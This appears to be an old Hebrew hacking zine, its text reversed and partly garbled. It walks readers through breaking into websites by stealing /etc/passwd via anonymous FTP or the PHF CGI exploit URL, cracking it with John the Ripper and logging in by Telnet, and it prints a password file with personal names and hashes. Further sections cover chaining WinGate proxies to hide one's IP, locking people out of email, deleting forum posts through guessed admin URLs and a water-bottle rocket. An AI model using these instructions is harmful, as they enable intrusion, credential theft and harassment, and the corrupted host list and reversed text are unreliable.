.סקונילבו סקינויב קר דבוע הז לבא זיגפהל םיצור םתאש המב רתאה תבותכ תא ופילחת
.תקרפתמ איהש דע םיקפודש ןוויכמ תלדב הקיפד תוארקנ הלא תויש
ינא רתא !ורפלב זא סקינוי םהל שיש !ראב תודיחיה תואמה ןיב ינאש הז לע ךמתסמ ינא
תדוקפב שמתשי
!ורפל תויש ןוילימ הזיא שי (םירתא תלפהל תויש דואמ הברה שי ליחתנ ואוב (תונולחל
שי לבא םירתאל
:תומסרופמ שולש
PHF, FTP, Exploit .תכבוסמ יכה םג איהו תיעוצקמ יכה הבו יכה איה יולפסקא *
'ה תיש Exploits לע תססובמ תכבוסמ יכהו תיעוצקמ יכה הבו יכה Telnet .ללכ ךרדב
םיתרשב תוצופנ תולקת לע תוססובמ יולפסקאה תוישש לודגב םכל דיגהל לוכי ינא
.םיוסמ ןמזב תואצמנש
תורחאה תוישה יתש תא ריבסי ינא הז ךמסמב Anonymos FTP 'ו PHF .
:םיבלש השולשב איה )רחא תרש לכל וא( רתאל הצירפ זא
- !בוק תגשה passwd
- 'ה !בוק תצירפ passwd תאיצמו רקארק םע UserName 'ו PassWord
- ךרד רתאל הסינכ Telnet 'ה םע UserName 'הו PassWord םתגשיהש
> !ורפל םיצור םתא וילע רתא םג ךירצ יתרכזנ
שי בורל םימסרופמו םילודג םירתאל !ורפל תוסנל !ילממ אל ינא FireWall לקש רבד אל הזו
(רובעל
!בוק תצירפ .#יכה ליבשב תוסנל יאדכ אקווד רבחה לש רתאל passwd ומכ ךבוסמ ןינע אל הז
םתא עמשנ הזש
רקארק דירוהל םיכירצ Cracker 1ack, 1ohn the Ripper, Brute Force Cracker, or
1ack the Ripper
.סקינוי לע קר םידבוע םהמ קלחש תורמל (הלא תעברא לע !ילממ ינא
.ותוא !ורפלמ !בוקה תא אוצמל השק רתוי יל
:םיכירצ רתאל !ורפל ידכ
! FTP Client :מ המגדה תסריג דירוהל רשפא
www.ftpvoyager.com
'ב הנכותל קארק שפחל ךכ'רחאו AstaLaVista.com שמתשהל תורשפא םכל היהתש ידכ
.ןמז תלבגה אלל הנכותב
! Telnet Client
נרניאל רבוחמש בשחמ לכ לש תונולחה תיקיתב תויהל רומא
! Password Cracker :מ דירוהל רשפא
/ www.hackpalace.com/cracking/unix-passwords
! Dictionary Word List :מ דירוהל רשפא
http://wacophreak.hypermart.net/archives.htm
3=N
.ימינונא יפ י #א איה )הלש תוליעיל תיסחי( רתויב הלקה ךרדה
'ה !בוק תא םיגישמ ונחנאש ינפל passwd .!בוקה הארינ ךיא הארינ
יצבק לש םיגוס ינש שי passwd .
אוה ריבסי ינאש ןושארה UN-Shadowed Password File .
:יתאצמ ינאש יתימא !בוק אמגודל הנה
fldl0001:oS6quCRbDkmuM:537:300:Diane Laing:/home/fldl0001:/bin/bash
alastair:UZ9MFB7pOLvH6:540:100:Alastair
Sommerville:/home/alastair:/bin/bash
y2aberne:SjfSyVTnZ3ZT6:541:300:Kate Abernethy:/home/y2aberne:/bin/bash
y2ronxin:Ter0LeetG7uH6:542:300:Maggie Ronxin:/home/y2ronxin:/bin/bash
y2fair:.HocpfcuhgBbU:543:300:1ane Fair:/home/y2fair:/bin/bash
y2mcbrid:faARb1ftg.xfg:544:300:Emma McBride:/home/y2mcbrid:/bin/bash
y2hunter:HdXaBQoGpdR1Q:545:300:Gavin Hunter:/home/y2hunter:/bin/bash
y2marsha:3dtDG9VDCAXAw:546:300:Ruth
Marshall:/home/y2marsha:/bin/bash
y2halket:AcuYHIXytcDac:547:300:Steven Halkett:/home/y2halket:/bin/bash
y2macfar:g1k5tnbE3mn4w:548:300:Cassidy
MacFarlane:/home/y2macfar:/bin/bash
d2wilson:u7TfMN0MeKPjY:550:300:Robert Wilson:/home/d2wilson:/bin/bash
d2hunter:b7wdUm1obrfuc:551:300:Douglas Hunter:/home/d2hunter:/bin/bash
d2bell:k9SnbgYAdblnI:552:100:David Bell:/home/d2bell:/bin/bash
d2lane:eArmBPOBOn31.:553:300:David Lane:/home/d2lane:/bin/bash
y2bentle:A725bDhP/gCNE:554:300:Scott Bentley:/home/y2bentle:/bin/bash
.םיכורא רתוי םג תויהל םילוכי םיצבקה
:!בוקהמ אמגודל הרוש חקינ ואב
y2bentle:A725bDhP/gCNE:554:300:Scott Bentley:/home/y2bentle:/bin/bash
:הזה גוסהמ םיצבק לש יסיסבה הנבמה תא ןיבהל םילוכי ונחנא וישכע
Username:encrypted password:user number:group number:real name:home
directory:type of shell
םיצבקה לש ינשה גוסל וישכעו Shadowed Password Files :
:אמגודל !בוק דוע הנה
root:`:0:0:Charlie &:/root:/bin/csh
toor:`:0:0:Bourne-again Superuser:/root :
daemon:`:1:31:Owner of many system processes:/root :
operator:`:2:20:System &:/usr/guest/operator:/bin/csh
bin:`:3:7:Binaries Commands and Source,,,:/:/nonexistent
games:`:7:13:Games pseudo-user:/usr/games :
news:`:8:8:News Subsystem:/:/nonexistent
man:`:9:9:Mister Man Pages:/usr/share/man :
uucp:`:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:`:67:67:X-10 daemon:/usr/local/xten:/nonexistent
nobody:`:65534:65534:Unprivileged user:/nonexistent:/nonexistent
3=.
ftp:`:14:5:Anonymous FTP Admin:/var/ftp:/bin/date
y2bentle:`:554:300:Scott Bentley:/home/y2bentle:/bin/bash
ךרד !ורפל םיצור םתא וילאש רתאל סנכיהל םיכירצ םתא ישעמה קלחל וישכע זא FTP (
:םושרל ךירצ ןפדפדב יפ י #א ךרד רתאל סנכיהל ידכ
ftp://webpage_goes_here
.פייקסנב שמתשהל דואמ !למומ ןפדפדב יפ י #א ךרד סנכיהל םיסנמ םתא םא
עמכש תעדל יאדכ 99º .ימינונא יפ י #א ךרד הסינכ םירשפאמ אל םיתרשהמ
:ומכ תועדוה ולבקיתו וחילצת אל םימעפה בור Anonymous Users Not Allowed
.יפ י #א ךרד תימינונא הסינכל השיג םסוח וא רשפאמ אל רתאהש רמואש המ
תא ליעפהל םילוכי םתא םתחלצה אלש הרקמב FTP Client תנכות לכ וא םתדרוהש FTP
(סנכיהל תוסנלו תרחא
'ה םע קחשל תוסנל םיכירצ םתא זא (וחילצת אל םימעפה בור ports תילגנאב םיארוקש המ
port surfing .
ךרד קזח ןגומ סנכיהל םתיסינ וילע רתאה םא FireWall תושעל ליחתהל םיכירצ םתא זא
ומכ םירבד Trace ידכ
.םהילע !ורפל תוסנלו הזה בשחמה םע םידבוע םיבשחמ הזיא תוארל
תנכותב יפ י #א ךרד רתאל סנכיהל םיסנמשכ FTP Client םירפה תא אלמל םיכירצ
:םיאבה
FTP SERVER-target goes here
NAME-name of target goes here
LOGIN NAME-anonymous
PASSWORD-your email or ~an¨ email address here
'ב רתאל סנכיהל םתחלצה םא FTP תנכות ךרד וא ןפדפדה ךרד FTP Client םירומא םתא
תוחפל תוארל 4 :תויקית
/ bin
/ etc
/ lib
/ pub
םשב !בוק ושפחת passwd םשב וא passwd.db היקיתב etc .םכלש בשחמל ותוא וקיתעתו
'ה תיש PHF ירתא תצירפל Web 'ה תיש (והשימל רוזעי הז ךמסמ םא חוב אל ינא * PHF
דואמ הושפ היש איה
'מ רתויב לבא 99º ןנוגתהל ודמל םיתרשה לבא הדבע איה םעפ (תדבוע אל איה םימעפהמ
.הנממ
ךירצ התא רתאל !ורפל ידכש עדוי )חומה תא ןיזמ םתס אלו( גניקאהב תצק ןיבמש ימ לכ
ימינונא #דל סנכיהל
םע ותוא !ורפלו דרוו ספה !בוק תא דירוהל Cracker .
:אב הז הנה זא
http://webpage_goes_here/cgi-bin/phf?Qalias÷xº0a/bin/catº20/etc/passwd
:וא
http://webpage_goes_here/cgi-bin/phf?Qalias÷j00ºffcatº20/etc/passwd
:בותכש הפיא webpage goes here .רתאה תבותכ תא םיבתוכ
'ה !בוק תא וארת םתחלצה םא passwd .םכלש בשחמל ותוא וקיתעתו
'ה !בוק תא םתגשיהש ירחא וישכע passwd רקארקה לש היקיתל ותוא קיתעהל םיכירצ םתא
לש היקיתל קיתעהלו
3=;
'ה !בוק תא םג רקארקה Dictionary Word List .םתדרוהש
רקארקב םישמתשמ םתא םא 1ohn the Ripper ךרד וסנכית DOS רקארקה לש היקיתל
:ובתכיתו
john -w:Dictionary_FileName_goes_here Password_FileName_goes_here
'ב תאצמנש הלימ לכ רבחל הסני רקארקה Dictionary Word List תרתסומה המסיסה ןיבל
'ה !בוקב passwd
.םיאתמה בולישה תא אצמי אוהש דע
םכל ןתי אוה םתחלצה םא UserName 'ו PassWord .דחאמ רתוי םימעפה בורב
רקארקב םישמתשמ םתא םא Cracker 1ack 'ל תונולחמ תאצל םיבייח םתא DOS יכ
בצמב דובעל בייח רקארקה
לש $יתימאB MS-DOS .Cיקנ ןורכז$ב שמתשמ אוהש ללגב
'ה יבגל םכתוא לאשי אוה רקארקה תא וליעפת רשאכ Password File 'הו Dictionary File :
Pwfile(s): Password File
Wordfile: Dictionary File
םתגשיהש ירחא UserName * ו PassWord תא וליעפת Telnet Client .
לע וצחלת וישכע FILE - REMOTE SYSTEM וכרתצת ךכ'רחא (רתאה תבותכ תא וסינכתו
'ה תא סינכהל UserName
'הו Password !!! רתאל םתצרפו םתגשיהש
Program44
ילפס נ
םיצורע לע תולתשהל ידכ לצנל םילוכיש בוצק ןמזל תולצפתה :תרשב האיגש ןמ הז ילפס נ
(םימלש
וסנכו !ורעהמ ואצית וב םיאצמנ םתאש !ורעב דחא #א היהי אלש וגאדת ילפס נ שי רשאכ
פואה הנהו הרזח
םומינמ חקול הז !ורעל הרזח ועיגי םלוכש וכח :הדובעה לכ אל וז וישכע 3-4 םומיסקמ תוקד
הנהו העש יצח
םכלש הילשב ולוכ !ורעהו וההזתו !ורעל רסי"גר רהמ ושעת וישכע שי םכלו פוא ןיא םהל
תושעל םילוכי םתא
לכה ושפ לכה שארב םכל הלועש המ לכ
Program44
3J*
לייאמ יא תובית תריגס
תאז תושעל םילוכי םתא ליימיאה ןובשח תא ול רוגסל םיצור םתאו םכתוא ןבצעמ והשמ םא
(תולקב
ובותכת םעפ לכ ' סנכהל תוסנלו (ולש ליימיאה ןובשח קפס לש רתאל סנכהל םיכירצ םתא
.הנוש המסיס
הז תא ושעת םא 30-40 .ןוחיב ימעמ תימווא רגסי ןובשחה תופיצרב םימעפ
Program44
3J+
םיקיחצמ תומש
יז סכלא ' םמוסמה יסורה
דד השימ ' רקוחה
הנ ידע ' תירירבשה
התוח ינב ' עוגרה
הקש המיס ' תינמרבה
ןורפ יתא ' הריכזמה
רופ יקית ' תרפאמה
הינ המיס ' תינרפסה
וי ידיא ' םמומה
ביבס ימס ' רושה
הרוג החמיש ' ורבחו
יאו הינא ' הליצמה
הלקס יב ' תסייה
הבפ הימ ' יפויה תכלמ
3J9
#יר החמיש ' לפאלפה רכומ
חצ הרימ ' תישלבה
רפוק ילאו ןור יבא ' םיסייה
יתמד רינ ' ינונשי
דומ הכימ ' דומחה
לופ יב 'הדיקפה
רמ יזועו רב ידוא ' םינישלמה
דבא תימע ' דבאתמה
ךומ הנרוא ' תינרואתה
לולסמ הלילע ' היברעה תינמגודה
הדימע הליג ' תובא'תיב תלהנמ
סומ ינב ' סמונמה
רובע תור ' תינוחלאה
םייח ינח ' םיינישה תאפור
הנ ןומיס ' תינומב עסונ
ןורפ יתא ' הריכזמה
היצו יומ ' גולוכיספה
ירמ יסא ' םוקעה
!ופ קילול ' ליצמה
םתס יניפ ' קנחנה
עקש םאסב ' םמוסמה יברעה
ילת השימ ' רוכישה
הצ ירמ ' ןיינבה תלעופ
יתחצ ארזע ' בצקה
יתחצ הרפוע ' ותשאו
קוחלדוג ינב ' עשופה
קנרפיל רימת ' יאקנבה
סוקניפ ' גולוקינגה
םיצומ החמיש ' רצלמה
םייח ינח ' םיינישה תאפור
רבדנ המלע ' תיגולוכיספה
המ הלא ' המצעב החובה
ןוי יקומ ' ןצילה
וב ריש ' תשקשקמה
הלקצ ירב ' ןצאה
הבמגב התאגנ ' יפויתאה ןקריה
רפ הכימ ' גולואיכראה
יתאצמ המואר ' תיגולואיכראה
הבפ היאמ ' תרעוכמה
רוצ יקב ' תינרצקה
!וח הלול ' העוגרה
ילור זעוב ' ןכסמה
יי"ג ידע ' ןילקתה
ךימ ןתיא ' ולש רבחו
ןורח הריש ' תינילקתה
וצר יתמ ' רצלמה
ותש יתמ ' ורבחו
ילורס םי ' לסרודכה ןקחש
ררד יקימ ' הצובקל ורבח
רורד יקב ' תינלסרודכה
רבדנ המלע ' תיגולוכיספה
ה ירמ ' תיאקימסוקה
רוקינמ ' יאקימסוקה
םשונ ןולא ' יתמסאה
םיצומ החמיש ' רצלמה
םיכול יומ ' גהנה
לוד ירמ ' םיינישה תאפור
לדב ינב 'לגרודכה ןקחש
קז הכימ ' םלוע רמ
הלול הפי ' תרעוכמה Program44
םניחב םירתא םיקיזחמש םיתרש
S?U?cRb @DG S@G ]HU TUE
httIh//4e4bers%nana%co%il/user
ad4in/IhI
]HU RT\
httIh//www%4agicIage%co%il
G S@G ]HU a@T@UE
httIh//angelQire%l)cos%co4
G ]HU a@\GRB-#P
httIh//dirt)Qreehost%co4
3J3
-#P
G S@G ]HU a@T@UE-#P
httIh//Qree%Irohosting%co4
"3P s &G, s 33, ! -#P ! a@WS?W +** S?U?cRb T@ ]HU
httIh//4e4bers%Qreeweb(%co4
=* M SU?cRb a\
httIh//www%=*4egs%co4
"3P s &G, s 33, ! -#P ! +**M S?U?cRb T@
httIh//www%bigsitecit)%co4
"3P ! 3*M S?U?cRb @DG
httIh//www%brinkster%co4
-#P s "3P ! 3*M
httIh//www%cQ4!resources%co4
a@RWG a\ a@[?RT ]U^
httIh//www%crosswinds%net
9*M
httIh//www%doteas)%co4
-#P !9*M S?U?cRb @DG
httIh//www%Q9s%co4
9*M S?U?cRb a\
httIh//www%QreeserVers%co4
=*M >`] TBRG RWG
httIh//www%Qree)ellow%co4
"3P s &G, s 33, ! -#P a@RWG a\ a@[?RT ]U^
httIh//www%gala')!citie%co4
=M S?W_C S?U?cRb
httIh//www%geocities%co4
=**M S?U?cRb a\
httIh//www%gi(ba%co4
"3P s &G, s 33, ! -#P ! +** M S?U?cRb T@
httIh//www%inchaos%net
! "3P s &G, s 33, S?U?cRb d@B a@[?RT ]U^!-#P
httIh//www%4arhost%co4
=* M
httIh//www%4icroworld%co4
+** M
httIh//www%netcolon)%co4
-#P ! +=* M
httIh//www%toIcities%co4
-#P ! =* M S?U?cRb a\
httIh//www%triIod%l)cos%co4
-#P ! =* M
httIh//www%VirtualaVe%net/
"3P ! 9* M S?U?cRb @DG
httIh//www%webhost4e%co4
-#P s "3P !3* M
httIh//www%websa4ba%co4
"3P s &G, s 33, ! -#P ! 9= M
httIh//www%webweaVer%nu/do4
3J:
ain%ht4
"3P s &G, s 33, =* M
httIh//www%wwQcircuit%co4/netw
ork
"3P s &G, s 33, ! -#P ! 9= M
httIh//www+%do4aindl'%co4
HFM
ןופאלפל תועדוה תחילשל
http://www.peletext.co.il/peletext/send_message_form.asp
HFM
םימ לי
םימה לי תא תונבל ךיא יל ריבסהש ."גל הדות דיגהל הצור ינא ליחתנש ינפל ןושאר רבד
.הזה ירזכאה
יתימא אוה הפ לכה ןכלו יל רמא ."גש הממ הלימב הלימ בתכנ הפ בותכש המ לכ בל ומיש
.רתויב ינויגהו
תוינויח אל םה לבא .ילש תויוע הלאש תויהל לוכי זא םייתש וא הלמ הפ יתפסוה םג ינא ' ב.נ
): וגאדת לא זא היינבל
3J=
.הדובעל הללאי זא
םירמוח :
1 קובקב . 1.5 .ריל
2 .םהש קקפ .
3 .םימ .
4 .)הנשמ אל הזש הככ הכיסה התוא יהוז ( םיינפוא וא( םירודכ חופינ תכיס .
5 .)#ידע'תילמשח( תינוכמ לש הבאשמ / )תינדי( םיינפוא תבאשמ .

:היינבה ךילהת
קובקב םיחקול 1.5 ךרעב םימ ותוא םיאלממו ריל 0.25 דע 0.5 .ריל
איהש דע םירודכ חופינ לש הכיס וב םיעקותו קובקבה תא תימרה רגוסש םעש קקפ םיחקול
.)קקפה לש( ינשה דצהמ תאצוי
הבאשמ וא םיינפוא תבאשמל הכיסה תא םירבחמ ( קזח שממ קקפה םע קובקבה תא םירגוס
.חפנל םיליחתמו םינווכמ ( תינוכמ לש
.)ילש תיבהמ הובג רתוי #ע הז( .ידמל הקזח הרוצב ומצע תא רגשי קובקבה תוינש המכ ירחא
:רהזיהל הממ
.םינפל םכמצעל קובקבה תא ןווכלו םישפ תויהל אל ולדתשת הבו תישיא יל ושעת
!!!באוכ ארונ תויהל לוכי הז
HaSaTaN
WinGates
.א םיכרצמ :
1 )!!למומ( רנניאל רוביח .
2 . WinGate scanner 2.2 )הבוח אל(
3 נלה תנכות תא .
4 ( תומישר סקנפ . LOL )
3JJ
םצעב הז המ .ב WinGate +
WInGate תרש :לש הליבח םצעב אוה proxy :לשו firewall לא רבחתהל ןתינש ומכ (םכחותמ
תרש Proxy תרשל םג רבחתהל ןתינ ךכ WinGate :גוס לכמ תויהל לוכי רוביחה ! Dial-Up
(ליגר ADSL ןבומכו ( ISDN, T1, DISH ."וכו (
+ללכב הזב שמתשהל יל המל .ג
'ה תרשל רבחתתש רחאל WinGate םתא וישכע( (תשר לכלו רתא לכל רבחתהל לכות
'המ (ילש בשחמהמ םג הז תא תושעל לוכי ינא לבא ):םילאוש windos shell ++!!ילש
'ב ינויחש יתימאה רבדהה (לדבהה אל הז תמאב (ןוכנ (הככ זא WinGate 'ה תרתסה$ הז IP
תרשל רבחתמ התאשכ .$ךלש WinGate לש יפ יאה תא קר הארי אוה ...ךירחא בקוע והשימו
'ה תרש WinGate תרשל רבחתהל בושח (גניקאהל רושקש םישועש רבד לכ ינפל ןכל !
WinGate !
םימשורש םיתרש שיש הז (איה תירקיעה היעבה log's 'ה תא אוצמל רשפא )!!( ןכ םשו (ךלש
IP 'ה תא לבלבמ הז (דחיב םיתרש המכל םירבחתמ הז םישועש המ זא ()!!( ךלש יתימאה
LOG'S !
+הזל םירבחתמ ךיא .ד
המכ יל שיש חיננ IP'S יתרש לש WinGate :הככ (חיננ (
200.231.12.1 :םשב ארקי .' A
124.103.43.5 :םשב ארקי .' B
190.233.12.1 :םשב ארקי .' C
189.121.32.4 :םשב ארקי .' D
200.232.22.1 :םשב ארקי .' E
'ל רבחתנ וישכע A !
'ל וסנכ Telnet לע וצחל המש ( connect -> remote system 'ה לש םוקמב זאו ( Host Name
'ה תא ובתכ IP ובתכ רופה לש םוקמב ( 23 .איהש ומכ וריאשת תישילשה הביתה תאו (
:אבה רבדה םכל עיפוי םתרבחתהש ירחא (וישכע
2 WinGate
'ל םירבוחמ םתא (והז Wingate 'ה רפסמ תא ובתכ ושפ (דועל רחתהל ליבשב (דחא IP לש
'ה WinGate :ךכ (אבה
124.103.43.5 2 WinGate
תואמל רבחתהל ולכות (האלה ךכו (דחא דועל רחתה אוהו WinGates !!
3JN
הרעה
:הרעה
:בש אדוול שי terminal -> prefereces -ב ןמוסמ V :תואבה תויורשפאה
Loacl Echo
Block Cursor

:הז דילו
VT\100 ANSI
'ל ונרבחתהשכ הרק המ (בל ומיש (וישכע A קרש רוכזל םיכירצ םתא ( A 'ה תא עדוי IP (ונלש
B 'ה תא קר עדוי ' IP לש A 'ו ( C 'ה תא קר עדוי IP לש B םירבחתמ םתאש לככש הככ (
רתויל WinGates !םכילע תולעל השק רתוי היהי ךכ '
'מ רתויל רבחתהל אלש םכל !ילממ תישיא ינא 6 תא םכל אי הז יכ )הברה יד ארקנ הז םג(
לע הבתכה תא וארקת( נרניאה Proxies ...)
:הככ השענ (ןיינעה תא רתוי בו ריהבהל ליבשב
תרש .' ךלש נרניאה קפס .' ךלש בשחמה 1 תרש .' 2 תרש .' 3 תרש .' 4 תרש .' 5
תרש .' 6 ...ןברקה .'
תרש אוה םיתרשהמ דחא לכ WinGate 'ה תא קר עדוי תרש לכו ( IP .וירוחאמש תרשה לש
לש תובותכ גישהל לוכי ינא דציכ .ה WinGates +
'ה תא שי הז ליבשב (ךכ זא (יקוא Wingate Sanner 2.2 ותוא יתדרוהש הנורחא םעפב (
:הפ היה אוה )....ןמזמ(
http://www.hotmanscave.com/filez/filez.html
!לגוגב ושפחת םומיסקמ (הלימה לע יתוא וספתת לא
לש םירדחהמ דחאל סנכיהל (איהו תמסרופמ היש דוע הנשי Dal-net םיבו םירדח שפחלו
:)לאמשל ורשית( םהילא ושעת (םהלש םיפואל וכל (גניקאה לש
/ dns <nick .
תבותכ היהי יאדוול בורק ' ולבקתש המו IP תרש לש WinGate ...והשלכ
+אל (הדומח היש
!םללללוכ לע ספ ומישת (םייחב םכל אבש המ ושעת (!קציק הא
HaSaTaN
םימורופל הצירפ
:םימורופל תמדקתמ הצירפ
םימורופל תמדקתמ הצירפ רמוא ינאשכ .םימורופל תמדקתמ הצירפ דמלנ םויה (בו
לש ןימדאה ללכ ךרדב יכ( ולש הדרוהו םינותנה דסמ םש תאיצמ לע רבדמ אל ינא
לצא םיגאב לע רבדמ אל ןבומכ םג ינא ()םינותנה דסמ לש ומש תא הנשמ םורופה
ידוק םהב סינכהל רשפאש םימורופ Html ונחנאש המ .םירוביד ימורופ לשמל ומכ
האלמ ךרד האצמנ אל םויה דע .םימייוסמ םירמרפב שומיש הז תושעל םיכלוה
ינא בוש .םימורופל יתעד יפל תיעוצקמ יכה הצירפה גוס תאז לבא (הז תא חבאל
3J.
הזה עדיב .עדיו חוכ הברה םכל תתל לכויש סק בתכיי ןאכש םכל ריכזהל הצור
בו שומיש וא ()ותוא םתצרפש םורופה לכ לע תובהלתה( ער ןפואב שמתשהל ולכות
םורופה תא ול חבאל העצהו !ורפל רשפא הבש ךרדה לע ןימדאל העדוה( הזה עדיב
( היינשה תורשפאה לע םכלוכל !ילממ ינא .)הרומת תשקב ילב White Hat ללגב ()
הזיא וא העיבת ופחתש יוכיסה םג ךכו( רתוי ןק אוה םכילע וסעכיש יוכיסהש
תויהל .)וליפא רצעמ וצ White Hat Hacker (יתעד יפל דובכ רתוי םע םג הז
תויהל לכל #סונבו White Hat Hacker המכל דוגינב (םירקאהה לכל בו םש ןתונ
םהש םירקאה Black Hat שמתשהל םכלוכל !ילממ ינא .םירקאהל ער םש םיאיצומש (
!!!ליחתנ ואוב (בו .תוער אלו תובו תורמ ליבשב ןאכ עדימב
יונב םורופה ךיא
.יונב םורופה ךיא ןיבהל לכ םדוק םיכירצ ונחנא (םורופל !ורפלו תוסנל ידכ
תפשב םייונב םימורופה בור (בו Asp :תרש דצ( Active Server Pages םנשי .)
תפשב םייונבש םימורופ םג Php .םיעמ הלאה םימורופה לבא (תרש דצ םג איהש
תפשב םימורופ לע ססבתנ ונחנא םויה Asp םורופה +םורופה יונב ךיא זא (בו .
אוה וב קוסענש קלחה .)םויה קוסענ אל ותיא לבא( םינותנ דסמ םע רושקתמ יונב
#ד ידי לע םיספה דוביע Asp קייבוא ךותב ןותנה סקה תא ךפוה #דה (בו .
#דל סנכנש (הנתשמל םייוסמ Asp .םורופב ונחנאש בושחנ ואוב .רמרפ רותב
.תויורכהו םיבשחמ (םירס (הקיזומ :לשמל ומכ (םימורופ יאשונ שי הז םורופב
(בו .ןושארה רמרפה היהי הז .רפסמ יפל גלוקמ הזכ םורופ אשונ לכ (וישכע
#דב דבועמ םג העדוהה אשונ .החלשנש העדוהה אשונ לע בושחנ וישכע Asp ןכלו (
שיש ןוויכמ( דומעה רפסמ אוה וילע דובענש ןורחא רמרפ דוע .רמרפ אוה םג
םנשי םימעפל (םייוסמ #ד לש ילמיסקמה הבוגה לע תולועש תובוגת םע םיאשונ
גלוקמ םהמ דחא לכ (םירמרפ השולש (בו .)דחא דומעמ רתוי םיספותש םיאשונ
.םירמרפהמ דחא לכ לע עדימה תגשהל רובענ וישכע .רפסמ יפל
םירמרפה לע יחרכהה עדימה תגשה
דואמ ךילהתה .עדימה תגשה ליבשב תוארל םילוכי ונחנאש המב שמתשנ וישכע (בו
ינא( םימורופה תעברא תא םיאור ונחנא (ישארה #דל םיסנכנ ונחנא רשאכ :ושפ
.)תויורכהו םיבשחמ (םירס (הקיזומ :םימדוקה םימורופה יאשונב שמתשמ ןיידע
לכ (וישכע .הקיזומ םורופה אשונ לש רמרפה המ תעדל הצור ינאש דיגנ (וישכע
תוארלו (רושיקה לע תינמי הציחל !וחלל (רבכעה תא תחקל הז תושעל ךירצש המ
איה ונלש םורופה לש תבותכה םא .םינייפאמ לע הציחל ידי לע רמרפה תא
http://www.forum.co.il :וב בותכ היהיש הזכ קניל הארנ ונחנא הארנכ זא (
http://www.forum.co.il/ShowTopic.asp&ForumID÷1 תונורחאה םילימב ולכתסת .
:רושיקב ForumID÷1 ארקנ ונלש ןושארה רמרפה . ForumID ונחנא הזה הרקמבו (
ךרעה ידי לע גצוימ הקיזומ םורופש םיעדוי 1 רחאל וישכע .האלה רובענ (בו .
ימ :העדוה אשונ שי הקיזומ םורופב (לשמל .העדוהה תא קודבנ (םורופל ונסנכנש
תינמי הציחל !חלנ ונחנא (ןורקע ותוא לע דובענ (וישכע +הקילאמ תא בהוא
לשמל רמואש רמרפ הארנו בוש לכתסנ .ליבומ רושיקה ןאל הארנו TopicID÷88 .
:דומעה םע רבד ותוא .ונלש העדוהה אשונ והז PagePos÷1 תא ונל שישכ (וישכע .
.השקה עקה םע ליחתהל םילוכי ונחנא (םינוכנה םירמרפה לכ
הצירפה ןכות
#ד שי םורופב הלועפ לכל (וישכע Asp תמאב סאבמה עקה (וישכע .התוא עצבמש
העדוהה תא קוחמל םיצור ונחנא םא (ללכ ךרדב (וישכע .#דה תא אוצמל ךירצש הז
היה רמרפה לבא ShowTopic ללכ ךרדב היהת העדוהה לש הקיחמה ( DeleteTopic .
:התוא גיצהל ידכ .םדוקמ אמגודה תעדוה תא קוחמל םיצור ונחנא לשמל (וישכע
http://www.forum.co.il/ShowTopic.asp&ForumID÷1&TopicID÷88&PagePos÷1 .
:אוה #דה .העדוהה לש הגצהל רושיקה הז (וישכע ShowTopic.asp :קוחמל ידכ .
3J;
http://www.forum.co.il/DeleteTopic.asp&ForumID÷1&TopicID÷88&PagePos÷1 .
אוה הקיחמה #דש יאנתב הז DeleteTopic.asp המישר ןאכ םכל ןתא ינא (וישכע .
:םתוא םיעצבמ ללכ ךרדבש םיפדהו תולועפ לש
העדוה תגצה
ShowTopic, Show_Topic, DisplayTopic, Display_Topic
העדוה תקיחמ
DeleteTopic, Delete_Topic, DelTopic, Del_Topic, EraseTopic
העדוה תכירע
EditTopic, Edit_Topic, EditMassage, EditMsg
Crossbow
)םיפלכ קחשמ( לסירפל הצירפ
קחשמל םיצרופ ךיא הארנ םויה !תמאב תמאב תמאב ...םיפלק יקחשמ יתוא םינבצעמ
ארקנש (ירסי"גרה ךרוע ול םיארוקש ילכב שמתשנ םויה ...בו .$לסירפ$ אונשה
תילגנאב Regedit לכ לע עדימ וכותב רמושש יקנע םינותנ דסמ הז ירסי"גרה .
וסנכ (ליעפהל ידכ (בו .םכלש בשחמה לע תויצקילפאהו תונקתומה תוינכותה
םש ובתכ .$הלעפה$ לע וצחל זאו ($לחתה$ ירפתל regedit םתאו (רנא וצחלת (
ושפ זא +ןוכנ (לכהו תויקיתה לכ תא שי לאמש דצב (וישכע +וישכע המ !םינפב
:הייקיתל םיסנכנ
3N*
MY COMPUTER\HKEY_CURRENT_USER\Software\Microsoft\Windows ,
CurrentVersion\Applets\Freecell
הייקיתה לע תחא םעפ םיצחול זאו Freecell םע תויות תויהל םיכירצ ןימי דצמ .
$ תיותה .םימייוסמ םיכרע losses ומכ והשמ הארי הז .םיפוצר םידספה תנמסמ $
.םיספא ינש לש תוגוז ינש דוע זאו (תורפס ינש לעב רפסמ זאו (םיספא העברא
ונל שי םא (דיגנ 7 :היהי הז זא (#וצר םידספה 00 00 07 0000 םיימעפ וצחל .
( םידספהה לש גוזה לע םיימעפ וצחל .תיוותה לע 07 (לשמל (ובתכ .)הזה הרקמב (
09 $ רותפכ לע וצחלת זאו OK שי ...הקיסיסל וכלתו (לסירפ תא שדחמ וחתפ .$
גוז (םיספא העברא ומכ ןמוסמ רשע .רתוי ךבוסמ הז הלעמו רשעמש (הייעב הפ יל
) ספא( תויתואו םירפסמ לש A ןמסל ידכ .םיספא תוגוז לש היישילש הז ירחאו ()
תא ךופהל ךירצ (הרשע דחא A תואל B .תיוות רובענ ואוב (בו ...האלה ןכו (
$ תיוותה wins (בו .תמדוקה תיוותה ומכ תלעופו (םיפוצרה תונוחצנה רפסמ הז $
...חחפ ...לסירפב םיפולא םתאש דיגהלו םכלש םירבחל !יוושהל ליבשב קיפסמ הז
רשאכ :והשמ ןיביש ארוקש ימ לכש הצור ינא (הסונמ תנכתמ רותב :הנורחא הרעה
...הככ םתס #חרמ אל עדימ יכ (דבאנ יחכונה עדימה לכ (הנכותמ אצוי שמתשמה
שי עיתפמ ןפואבו (םיריש תמישר ונל שי (פמאניוומ םיאצוי ונחנאשכ (דיגנ זא
הלאשה .רמשהל בייח עדימה +הרוק הז ךיא ...םיחתופ ונחנאשכ המישר התוא תא
פמאניוו הבש הייקיתב (בל ומישת םא !!!!בוק ךותב איה הבושתהו +הפיא (איה
ומשש !בוק שי (ןקתומ winamp.m3u אל םתא םא ...הנורחאה המישרה תאזש (
םע חותפל וסנ (םינימאמ notepad םא (וישכע ...העתפה םכל היהת ...!בוקה תא
אצמנ לכה (הלעפה ןמזב ןענש עדימ לכ (םיאיש תלב םע קחשמ לכ (בו ובשחת
(!בוק ךותב אלש והשמ שי םא ...קודבלו חל ליחתהל ךירצ ושפ !!!!בוק ךותב
